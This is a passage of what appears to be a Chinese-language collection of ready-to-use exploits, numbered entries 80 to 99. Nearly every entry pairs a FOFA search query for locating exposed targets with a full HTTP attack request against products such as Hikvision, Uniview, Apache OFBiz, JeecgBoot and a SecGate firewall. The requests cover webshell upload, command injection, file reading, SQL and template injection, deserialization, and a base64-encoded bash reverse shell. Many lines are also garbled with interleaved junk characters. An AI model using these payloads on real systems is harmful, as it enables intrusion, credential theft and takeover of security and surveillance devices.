8 }1 m2 H. M$ ~/ M, _ Y$ s0 [: IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 [4 H' m3 B7 P. o& T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 C( P4 g9 A/ x* K1 y
Accept-Encoding: gzip, deflate
% H1 } ? z- E6 E$ g/ g6 sConnection: close( r# O+ S. Z1 j# d$ R% c& ~# i' @
Upgrade-Insecure-Requests: 1
. c6 X. D$ r# m4 }' C+ [7 @% Q" G1 ~! V% A0 J0 k
$ Q/ a) j& N. l* C( V; @
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
7 W; D$ A" h' d" g4 BFOFA:app="速达软件-公司产品"
6 |# o: W9 Q& ^" j2 [POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.14 V& L; r, O+ Z; C" t7 f( j
Host: x.x.x.x
) b5 a0 R2 ^4 ?/ L& dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* l; R9 @* T V9 k" t" Q
Content-Length: 27
: G5 w) ]: u+ u7 Z2 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ `; X6 W2 C' E7 ~+ P/ [
Accept-Encoding: gzip, deflate
4 y5 X3 H& C0 t5 C/ [' f5 c0 JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) \6 x' A3 y- n3 A3 z( A+ {: ZConnection: close9 N W; D ?& s o3 r9 p( S* W: u
Content-Type: application/octet-stream
f& U: G, R4 h) i2 t1 B2 rUpgrade-Insecure-Requests: 1
- q" ?5 L$ v5 f; S4 y+ I
) z0 d% W7 [5 \" W- l2 u<% out.print("oessqeonylzaf");%>6 V; G* Z, I. j9 w3 h2 m: u
( B' I" L8 p9 ?- k$ P' ?9 H
+ P J$ A+ |- mGET /xykqmfxpoas.jsp HTTP/1.1- d R* s8 D7 S A: Z
Host: x.x.x.x
2 d! e1 _7 U5 d9 i: W8 S& JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# E" m3 j( c+ LConnection: close' b3 L- o8 @% }" E: L7 z# Y3 P
Accept-Encoding: gzip, m2 o# E$ i( C7 p- z3 C q
& L' q* Q" S5 X& D- h! a; b& q( c- Z I8 ^
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
0 g0 D! ?' y' A8 vFOFA:app="uniview-视频监控"
8 ~; E2 W- [6 qGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
' H' @- i/ i8 Q$ [Host: x.x.x.x1 F8 Z1 X# n! y; s" k& U- o$ S- I" u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. l0 Q) ]: a+ g
Connection: close8 K% A0 y$ g, M3 z/ [
Accept-Encoding: gzip
, B/ \; c# `/ C+ ]( H
, T: C& h: I/ H! T: P
- j% y( ^% E+ G& Q" {82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行- Q5 S6 E# Y0 |
FOFA:app="思福迪-LOGBASE"
# n( D4 L0 H* G+ u5 pPOST /bhost/test_qrcode_b HTTP/1.1
C; g" ~5 R# }+ M4 v; x* j; U$ oHost: BaseURL6 w7 |. R# A: y7 P& X# {
User-Agent: Go-http-client/1.1
9 M$ X% g) i3 k$ wContent-Length: 23+ `( ` h- u: w8 u4 D/ e
Accept-Encoding: gzip6 j. |; P. Z8 N8 K0 ?* o3 v/ n% g
Connection: close$ a6 R- n( ]7 g( c. \9 x. `. C
Content-Type: application/x-www-form-urlencoded
% q6 c# s1 w7 v3 F5 ]Referer: BaseURL# T$ @- E5 d" H* O. S
" t: w M8 i- c+ N2 r, v
z1=1&z2="|id;"&z3=bhost
1 o3 M( I0 K0 g/ N, \. o5 b: M6 X% m/ i
6 D6 V* @- r. P; o2 E- ?! y83. JeecgBoot testConnection 远程命令执行+ L$ ?+ f7 \5 w5 N: t
FOFA:title=="JeecgBoot 企业级低代码平台"2 Q+ h& L$ |7 @
+ B V9 P% S7 `6 Q9 d& e
1 j: O4 Q. |" e3 P* Z/ K. |POST /jmreport/testConnection HTTP/1.1+ k5 f2 R) I" A" B
Host: x.x.x.x0 U5 Y5 V: L8 v) I, G) o# o4 G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! k L2 [8 n, h/ vConnection: close
( I0 \4 _) v6 h- J% u% q- B: n9 I1 ^Content-Length: 88818 ^0 A, \( q' T: U4 r. q
Accept-Encoding: gzip. ~' `2 W8 [5 \$ Q" @+ x3 C) l
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
: Q; r2 j4 Q( A8 D% h/ Q2 _Content-Type: application/json
0 [% _4 _- J$ C- n8 U9 a$ X4 d% G5 f: D! ~0 r3 D* t
PAYLOAD+ `2 `1 ?0 I: Q6 J( n
! s1 A+ V3 e% i84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
- d: ^! U& l, T/ H1 IFOFA:title=="JeecgBoot 企业级低代码平台"
% R+ T5 [) B7 J: w4 F$ v- S$ V8 \; X$ U: L( Y" l& K* }: F
6 W5 \" ^" }1 u& @
. U& R3 c& {( h1 c7 E( j
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
, W) i8 ~- z/ l; ]4 `! EHost: 192.168.40.130:8080
. A1 i" {$ C7 ~- UUser-Agent: curl/7.88.1
6 j3 F. f, _; S: fContent-Length: 1562 \3 G9 o7 O2 t, @8 Y, V" g
Accept: */*8 ?) r/ L& O" m c" x9 { b
Connection: close
: I3 b$ Y' S% M6 _% YContent-Type: application/json
/ y7 k+ M6 u' ~Accept-Encoding: gzip1 }/ q4 f4 L# O" A i4 Q* |1 Z
* Y& t' U1 A3 L X8 h2 C
{) G6 u4 D( b" R9 h
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",) Y, t0 R7 y! e3 ?4 z* h
"type": "0"
0 O( B( k) S; {} q/ X. K. c! N. B* |: \9 D
8 @9 p/ B* j0 `7 w3 T9 X
/ [2 i5 R. v' v; S l' v3 D
85. SysAid On-premise< 23.3.36远程代码执行
) e5 j2 }- h2 Q v# E4 T( @CVE-2023-47246
" @: r# N7 p0 f- SFOFA:body="sysaid-logo-dark-green.png"
# _3 K4 l F3 T8 G2 u" H. x8 @. VEXP数据包如下,注入哥斯拉马
8 p- P# T4 J6 fPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
4 g* [ ]! B5 K6 U: h6 M1 lHost: x.x.x.x* y3 B/ S+ g- k0 G; |& p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 _* D) m+ d$ @7 H0 _. M
Content-Type: application/octet-stream. X# S$ Y! V4 K4 U" a: S5 \5 g
Accept-Encoding: gzip' i. y' x% g" q0 v0 @" `' i/ _) n
5 H: J2 ^( L! a: I2 N2 a
PAYLOAD" @6 A6 J1 ~# T. v
3 Y$ C& a9 k6 o/ g. P+ C
回显URL:http://x.x.x.x/userfiles/index.jsp2 g9 ]% o/ q V% F; [9 m- v! [
3 M" n; ?- P7 b8 d- N; x( w. R9 z3 D86. 日本tosei自助洗衣机RCE# p8 l6 p# c7 F2 T9 a- J' U% o) v
FOFA:body="tosei_login_check.php"1 P( D b+ A) L8 ^9 u. Z
POST /cgi-bin/network_test.php HTTP/1.1# V' K& c* j/ y+ a7 d+ f8 i( u! M
Host: x.x.x.x
, |! H+ D( G; `) {7 c! F gUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
0 H! e3 y" s1 O$ F8 @. TConnection: close1 A: Z8 d% ]# o. `1 T% l8 N, S9 H
Content-Length: 445 I: n" R1 `, l, V
Accept: */*
% N# o/ q6 U% ^0 s" B; ~8 ~( RAccept-Encoding: gzip' w5 Q" O a y
Accept-Language: en- K: B/ o" G3 I
Content-Type: application/x-www-form-urlencoded. @) c8 J( h7 N1 @
1 w. `/ a: l. [2 khost=%0acat${IFS}/etc/passwd%0a&command=ping( ?! ~/ W, n( O5 e3 M! @3 I
+ }2 g- B* L) f' m7 J
4 k! p. R; f9 F& M; X1 j& L87. 安恒明御安全网关aaa_local_web_preview文件上传3 Z% g( s0 L+ u4 g
FOFA:title="明御安全网关"# x: {% X% L0 I, H% w
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.14 N7 e. H2 X1 u9 `' b s7 Z% Y* `
Host: X.X.X.X
7 q* H) }. T) K+ }' d: G$ g1 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ @9 |0 X+ b5 Q6 w% f2 Y
Connection: close
% M0 @) W7 `- p6 C& ]Content-Length: 1986 }4 | q. O! m0 r3 [ Y- i
Accept-Encoding: gzip! v( ]. ], g. U- X* N" ]
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
2 g9 R. J! f! O6 k
7 g6 m8 ]5 J3 {7 \, \; C2 C--qqobiandqgawlxodfiisporjwravxtvd. U( D `; L. u9 Z8 \6 a% I( `
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
/ S( v. G( v1 w9 B6 o4 r- BContent-Type: text/plain. }! k6 O( @; {6 K( L8 P$ U5 T
! t# K2 m! n; N+ ~- h2ZqGNnsjzzU2GBBPyd8AIA7QlDq
0 X. l, w2 Z/ M$ ~9 w4 F--qqobiandqgawlxodfiisporjwravxtvd--7 ]! b: I1 O P( S; o8 @& y( {2 @
A" x# s8 ]( U: ?5 O5 P0 e/ V- |; E6 e) ~
/jfhatuwe.php8 Q+ N8 i% X- a8 L9 v- R$ h% W, U' N5 _
! n4 J$ o8 A! x$ ^5 q
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行; X% V4 X( x) H! e
FOFA:title="明御安全网关"/ R) X' ^# ?% a
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
& k; o2 Q2 b8 \Host: x.x.x.xx.x.x.x- k! [+ T' q* ~0 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) Y. [! K1 C5 b3 k# S2 K& oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% _3 \1 _: ^) E) H
Accept-Encoding: gzip, deflate
: W/ k# c, D" [/ s% IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 M+ ?2 {# j( \' {* e% s m5 P
Connection: close
d3 O, O& `0 C* ~1 e( j7 G4 J+ S/ B' b* `& ]
/ x# @+ |6 M0 {, ] q! c( Z6 [" I% r+ t+ k
/astdfkhl.php( T6 t" ~$ m; K8 L* c! p8 h
; |: l! O9 c3 b5 z5 x' u5 u, }4 ~& h) f89. 致远互联FE协作办公平台editflow_manager存在sql注入6 x5 e4 H! K; O& Q0 d( z! A* H1 m
FOFA:title="FE协作办公平台" || body="li_plugins_download"8 k( f# I7 P0 B7 r- L# |% R; F
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
R' I# p+ Y3 E5 F9 H, ]5 ]7 `, U; EHost: x.x.x.x: D* t& i7 M3 [+ O" v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 v4 z8 ^4 W: u0 L/ A8 a8 g3 D
Connection: close3 z6 r, I0 d4 _
Content-Length: 41- p! T O/ M) G& {
Content-Type: application/x-www-form-urlencoded
% \, `, |9 F0 I( f: [Accept-Encoding: gzip5 @1 V" D9 ~' b( c4 O S; q
3 F0 }8 e* A* Yoption=2&GUID=-1'+union+select+111*222--+% k# v7 U. Y) K2 I2 ^. I
) y/ h; j Y" J e" y: O
& z; t( w+ S9 j$ q0 P90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行& T) h$ a1 K& s5 k* }
FOFA:icon_hash="-1830859634"% W0 z. G& R8 ~9 ^0 D
POST /php/ping.php HTTP/1.1
7 r0 I# i$ T3 v; x ]3 q, G# kHost: x.x.x.x7 b+ f+ }3 j% {9 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
5 G$ B% x2 s \. iContent-Length: 51
, ~1 D4 o1 N( X6 i' S) K0 ^Accept: application/json, text/javascript, */*; q=0.01
9 r8 `$ s! t8 i: zAccept-Encoding: gzip, deflate
( r q1 |! u2 Y- B; G& lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" s$ P( |2 \' `
Connection: close
' v2 m9 g7 L0 J$ g* D! rContent-Type: application/x-www-form-urlencoded7 M) o( d9 O7 \6 V/ k! S
X-Requested-With: XMLHttpRequest
; X* [/ j6 K# Q$ m" u% {- i' K' n( k) m$ g M+ [( k+ V% i4 ^
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
1 g% j& Y6 F n( I9 K* Q* E
" S' S% J1 E2 D, |' g( ?
; G& Y8 O: E0 c' B; i91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
( b: R% M" r; n M6 ~' d P0 dFOFA:title="综合安防管理平台"4 i% ` ?3 U. B
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1' t' N7 K2 b" J
Host: your-ip
0 M8 a0 @- K1 K5 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% g0 {' @$ u9 `5 u1 |( \& PAccept-Encoding: gzip, deflate
0 x& r6 k8 j: tAccept: */*
: T0 @& w6 D1 w; O4 D7 \4 ZConnection: keep-alive
: o! ?8 G7 j9 f" N, _0 A
# Y3 _- l% J' a( W, d! O- p, H
' a# y }( O& d6 L2 J- F; [+ f" h) Y/ Y3 |4 D- E4 Z5 G4 U
92. 海康威视运行管理中心session命令执行0 o: n$ h: _" |+ `- B. F, T( e, R4 a
Fastjson命令执行
) A+ ?; ]5 M4 K: Y6 thunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
9 T/ J0 j: U- S2 b; v3 A2 zPOST /center/api/session HTTP/1.1! d" V" Y' f# ^5 L) u8 G
Host:1 C6 j' @3 Y4 M' w2 J
Accept: application/json, text/plain, */*
& A* u5 E: W4 t wAccept-Encoding: gzip, deflate- {! h( ^" Y; n6 x
X-Requested-With: XMLHttpRequest% S+ a+ |- P/ `; s
Content-Type: application/json;charset=UTF-86 [9 A# } i- w
X-Language-Type: zh_CN
$ p7 f W) e6 f. @7 [Testcmd: echo test
4 s$ O7 C O9 E! }3 X3 C. rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36: n8 [: Y2 |7 F- `0 q! L
Accept-Language: zh-CN,zh;q=0.9
+ S: ]& F" d, z1 C+ N& o0 RContent-Length: 5778, k5 N" B+ J+ |* S% g
( l6 C; _. Z4 u) E0 Q0 @PAYLOAD
# ^6 c5 ]1 `6 B# B, _% X/ o
0 x! r! m: F$ T) I) ~& y& d6 T7 M, v$ d/ L8 x
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传8 n& j) Z% S/ \" Q. D
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
3 e6 M" q: l# Y6 |POST /?g=app_av_import_save HTTP/1.1
& V, B4 r; y' ~2 e7 cHost: x.x.x.x
; T" {9 K! t0 Q/ u1 P) a% NContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
0 _1 [ H" \! I2 G4 f* g, JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 b2 x* i$ b* t0 p& k
1 X6 @; g. ?% X0 p- m! g
------WebKitFormBoundarykcbkgdfx! r; g6 m# v7 u7 ]4 j; q4 {+ l
Content-Disposition: form-data; name="MAX_FILE_SIZE"
5 g3 h: Z4 j$ n" i
9 f. X6 ^) s3 B3 U" r2 Y8 k8 U10000000
" |3 j+ U$ Z+ A, H------WebKitFormBoundarykcbkgdfx
# h* H* [7 R$ u5 d2 c* }' D% DContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"/ e) U/ L5 a2 k: f/ Q- J
Content-Type: text/plain
$ b3 O) v; w4 R. d' d5 e+ o
2 t8 A5 b3 Q* G+ ?wagletqrkwrddkthtulxsqrphulnknxa1 t" D7 @/ f; Z! Q& N) G& b) M
------WebKitFormBoundarykcbkgdfx
: ^; @# h9 }: ^ R; rContent-Disposition: form-data; name="submit_post". E6 P* @9 b+ a4 u7 o/ B
# S; Q$ ^4 ]0 K/ ]obj_app_upfile
" v1 ?2 s4 b: e1 X: d9 b! ]------WebKitFormBoundarykcbkgdfx
7 ]. q5 x+ r4 [% nContent-Disposition: form-data; name="__hash__"& D! q9 _2 E$ h1 t
6 Q4 e+ \ F1 B; c! m
0b9d6b1ab7479ab69d9f71b05e0e9445( n; P$ A ]4 j( L) Z
------WebKitFormBoundarykcbkgdfx--# A+ M5 E% s" h+ x, Q. o
2 O5 Y6 c+ G2 [! a9 E7 ^1 y* ] }
GET /attachements/xlskxknxa.txt HTTP/1.1% `0 f1 \ I6 n0 g0 x* y7 s
Host: xx.xx.xx.xx
6 w" C5 \9 S _1 _9 b1 k/ gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. M! a8 |1 o- Q; x
8 d8 T* _6 Y* x$ a5 Q
+ u$ B2 A1 y0 c+ n- {+ f- a9 ?) ?94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传. G: I- L/ C- \
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="1 P5 s2 X5 C# F/ x& a N9 u; {7 P
POST /?g=obj_area_import_save HTTP/1.1
, a/ A e L- ]; z6 _Host: x.x.x.x
3 g0 K! j" ]' [+ R% mContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
! ?& t/ I5 F* Y8 h1 y/ K4 B% ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
H+ k% [' k- E( s
, S$ C, Z0 a; S T7 D------WebKitFormBoundarybqvzqvmt4 c1 l: d5 O5 Z J) o# o
Content-Disposition: form-data; name="MAX_FILE_SIZE"
( S" b/ w; z8 }* }, X
7 \8 m& f& |/ Q5 z8 I9 E" O$ u! M10000000$ z2 W9 F) v" u }, l3 g( u7 Q
------WebKitFormBoundarybqvzqvmt' v+ m+ H X/ g7 P* V- @% t; B$ a/ p% c
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"+ Y% z' [! J q
Content-Type: text/plain
# b3 j# r7 d6 p9 A( N, {0 G' v5 G5 ~( Z7 b: _1 `, d/ S& K
pxplitttsrjnyoafavcajwkvhxindhmu
" V# C* |2 l1 R K" O$ r------WebKitFormBoundarybqvzqvmt
T' F. q }. X3 J1 IContent-Disposition: form-data; name="submit_post"
2 D5 S; X+ S" G7 Y; n; P! u/ m; V% K0 @4 y% R6 p4 P* ?7 x, ^
obj_app_upfile" L; W: J+ s8 t
------WebKitFormBoundarybqvzqvmt
+ x% j2 T$ E. h7 }; K+ |, dContent-Disposition: form-data; name="__hash__"+ ~& x& p/ y; E" x- b9 J( G, C% K& j
u5 K3 X; m2 g! I+ h0b9d6b1ab7479ab69d9f71b05e0e9445
- A8 `2 x1 V- o5 W2 E# m------WebKitFormBoundarybqvzqvmt--
8 H1 x( B5 c; ]7 T3 ]+ y
5 { b% e4 n7 S1 M
6 p' t* {) c6 I% `# ~
+ a$ j0 r1 F4 \1 K7 OGET /attachements/xlskxknxa.txt HTTP/1.13 U8 r! R* x; _1 P
Host: xx.xx.xx.xx
. T) ~# y3 S+ ]. F( n! T7 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 j% W: k# C. h; z( w' M. e7 x
5 h: l8 |" m S: s$ r; S
4 l& i6 T8 R- ?& k6 P1 `2 I. {3 U7 q7 t3 Y/ A8 T3 m4 }
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行8 O6 u4 J- V7 a' U y
CVE-2023-49070
- n3 d2 F2 `( _) A* w. j4 z2 gFOFA:app="Apache_OFBiz"
6 y: N2 [% B2 I" @/ p, _, L+ iPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
- _, Q/ k. _( L1 M. Q: EHost: x.x.x.x5 G. L# S1 C/ o6 D. e$ s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" \7 w. @6 z9 I& lConnection: close
' ]6 X$ ?% G; L3 R: F; OContent-Length: 889
7 O+ `2 J- [" E7 FContent-Type: application/xml
, l3 X' l8 l/ I zAccept-Encoding: gzip- C4 @& d/ ^4 @' j1 Y
' J2 n* ]( k7 L1 i; j; X<?xml version="1.0"?>
) W1 e+ P/ r2 j5 c2 }0 c: ]<methodCall>. W+ R7 g5 u; E" c# Z) R; A# ~' w
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>4 [) y1 v+ F& m/ \1 L( F: P8 c4 o
<params>2 e. k5 f& l6 u& g P
<param>
' Y% d( i" }3 J- E/ Y <value>
% J, _8 W* X) I8 c <struct>
, o7 S# g( f; c B <member>- z% F, p# r6 `$ o/ Y: P8 Z- M* W
<name>test</name>
% L( T: `- A' e <value>
% p4 s1 {5 _7 G+ a! w <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
6 ?+ H+ [ a' G0 O7 H: S$ {/ X/ A, w5 J </value>& E. _9 D1 r |! x: q
</member>
( k8 }- C' s% U* h </struct>
' O; F+ I; |1 @( d" I, } </value>
# D" f: A! Z$ n4 g </param>2 r& ~ j# Z$ y7 ?
</params>
$ m, q8 i. W h# h; Q</methodCall>
% Q% f2 `) V+ g; h
7 t w7 g' |& f$ K2 `- E! s. Q7 P4 ?* ?" b5 Q
用ysoserial生成payload
3 ^: V8 x. C9 D3 y8 ^ gjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
8 Q, m$ J3 T, u
* c% R9 J+ u9 i" i! e7 y
0 j' G6 Z+ l" k6 P8 p将生成的payload替换到上面的POC! T- I' L; \$ p; L+ o+ G/ T
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1: J+ e1 x8 a1 ~$ ]8 n1 T. u9 S
Host: 192.168.40.130:8443
# }/ U- ]# A" k) ~- C- N7 OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ J' ~+ F i$ F
Connection: close
* R7 r6 P7 U9 n% m0 q- j PContent-Length: 889
! o9 }& D5 y/ l3 P4 o! i' vContent-Type: application/xml
a' C9 I. X0 I6 K% J, c: Z1 |0 nAccept-Encoding: gzip
4 E/ `1 g+ X1 ]. Q! m. P: a% q5 ]1 p; M6 x4 C$ j# ~
PAYLOAD A2 }$ T2 t; ?4 `
; ?+ f5 O3 h+ @$ a2 u, @7 W, f
96. Apache OFBiz 18.12.11 groovy 远程代码执行0 k$ W) f% T3 u* a7 a
FOFA:app="Apache_OFBiz"
5 Q3 _* B" _4 iPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.16 y* b! f. ^4 d: X4 k% T
Host: localhost:8443
( Q% l# @$ I9 L# L# }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 |1 n* h$ [2 q8 e! l0 r0 E+ _
Accept: */*
- j1 H9 r. U fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 S: D( ^+ p$ e t5 k3 \' v! EContent-Type: application/x-www-form-urlencoded
9 p. ~1 y7 f! }/ q, PContent-Length: 55' h4 y" M6 s& C/ Q. ~) E2 E
* ^+ A5 R" ?' L2 m- l: D
groovyProgram=throw+new+Exception('id'.execute().text);) W) [. u* P. z6 W
+ o A+ r0 u% c$ Y1 P' B8 F( M1 Y
+ `- S$ z5 q5 h
反弹shell
2 ]0 {. D* z; N. r7 [在kali上启动一个监听
. P' j* x( M8 r# ?4 i" _. c$ cnc -lvp 7777
( _5 k1 V, l3 S' f" j' E5 _. P: T1 P: D$ z/ z
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.15 N% j! @6 Y( R5 `& D
Host: 192.168.40.130:8443
L; f2 h' ~1 C) T2 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.07 Z0 v8 O1 R. Y/ D3 q! k2 K2 ?! o
Accept: */*. u; |+ o, m; r, C" @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, N3 s3 R% O7 B7 nContent-Type: application/x-www-form-urlencoded
% e7 O: e# H1 m9 kContent-Length: 71/ r. h! g% Q! W! |( g
2 _" g4 E: I/ C4 X7 n0 `groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
# E5 {0 {; w3 J+ q3 O4 Z# s8 m, f- O+ y: y1 x z
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
6 o) H$ [% Y6 P9 o; MFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
& @/ M; V6 D/ L2 J0 xGET /passport/login/ HTTP/1.1
6 O) i5 {4 s( C+ Q% j8 vHost: 192.168.40.130:80856 H0 ^" H0 Y8 ~/ _ Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 y4 A" n( G! h. x
Accept-Encoding: gzip
2 O8 g1 `+ c. {* l3 A6 d8 m3 uConnection: close
- ], S' P) A8 [+ m" \# N) ?$ uCookie: rememberMe=PAYLOAD7 n) v) v! g3 `( Q/ F0 q
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
4 ~) g x, [9 O+ _$ @- D+ |2 }5 o _- ~1 G: o& [9 W4 y
, h3 ^" C$ O* q2 S2 ~: K8 T% j98. SpiderFlow爬虫平台远程命令执行* ]" E0 q3 F1 n* i i. x- | [* }
CVE-2024-0195
' u( M& K3 I! y& ~FOFA:app="SpiderFlow"9 x5 U" K- l. E7 ?5 Z
POST /function/save HTTP/1.13 q$ \3 @ C2 h" w( k; o5 V
Host: 192.168.40.130:8088
0 m4 j& j; I! C% F3 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ \3 g! ]0 N3 n3 ^8 T6 YConnection: close
2 I7 W2 L8 H( ^) }Content-Length: 121
( |- p4 G+ r, g" T- z' UAccept: */*( X! P) C% K% s; P8 p
Accept-Encoding: gzip, deflate
9 {) q+ _0 j2 ^6 IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- C9 C, G6 {- l# g+ I, e( ]* p6 {
Content-Type: application/x-www-form-urlencoded; charset=UTF-8( L7 `4 G5 c1 Z6 C- i
X-Requested-With: XMLHttpRequest3 q5 f/ D& R/ L) O/ z& `; |! W( U
6 z& b! B8 G, L2 z, B$ f. v
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B- K9 f: P9 ~. `9 w `5 o
' q7 g; j$ p$ q) N, t/ e0 N' _8 @$ h
99. Ncast盈可视高清智能录播系统busiFacade RCE, Z$ O7 h) i8 i9 f3 X/ V
